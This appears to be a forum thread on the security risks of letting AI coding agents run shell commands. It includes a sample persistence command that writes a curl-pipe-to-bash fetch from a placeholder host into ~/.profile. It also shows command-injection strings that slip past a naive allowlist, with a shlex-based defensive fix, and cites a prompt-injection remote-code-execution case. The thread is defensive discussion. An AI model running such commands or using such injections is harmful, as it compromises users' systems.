Using agentic AI for web browsing where you can't easily rollback an action is just wild to me.
Only if the rollback is done at the VM/container level; otherwise the agent can end up running arbitrary code that modifies files/configurations unbeknownst to the AI coding tool. For instance, it could run
bash -c "echo 'curl https://example.com/evil.sh | bash' >> ~/.profile"
Doesn't this give the LLM the ability to execute arbitrary scripts?
A check like

    cmd.split(" ")[0] in ["cd", "ls", ...]

is an easy target for command injection. Just to think of a few:

    ls . && evil.sh
    ls $(evil.sh)
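Both of these pass a naive first-token allowlist. A minimal sketch of a stricter check, assuming the commands are dispatched from Python (the ALLOWED set and helper name are made up for illustration): tokenize with shlex and execute without a shell, so metacharacters like && and $() are never interpreted:

    import shlex
    import subprocess

    ALLOWED = {"ls", "cat", "grep", "git"}   # illustrative allowlist

    def run_allowed(cmd: str) -> subprocess.CompletedProcess:
        argv = shlex.split(cmd)              # tokenize like a shell would
        if not argv or argv[0] not in ALLOWED:
            raise ValueError(f"blocked command: {cmd!r}")
        # shell=False passes argv straight to exec(), so "&&" and
        # "$(evil.sh)" arrive as literal arguments and are never
        # expanded or chained by a shell.
        return subprocess.run(argv, shell=False,
                              capture_output=True, text=True)

With this, "ls . && evil.sh" just makes ls complain about a nonexistent file literally named "&&" instead of executing evil.sh.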
2. Even if the AI agent itself is sandboxed, if it can make changes to code and you don't inspect all of its output, it can easily plant malicious code that gets executed once you try to run it. The only safe way of doing this is a dedicated AI development VM where you do all the prompting/testing, only very limited credentials are present (in case it gets compromised), and changes only leave the VM after a thorough inspection (e.g. a PR process).
Previously you might've been able to say "okay, but that requires the attacker to guess the specifics of my environment" - which is no longer true. An attacker can now simply instruct the LLM to exploit your environment and hope the LLM figures out how to do it on its own.
Amazon Q Developer: Remote Code Execution with Prompt Injection
https://embracethered.com/blog/posts/2025/amazon-q-developer...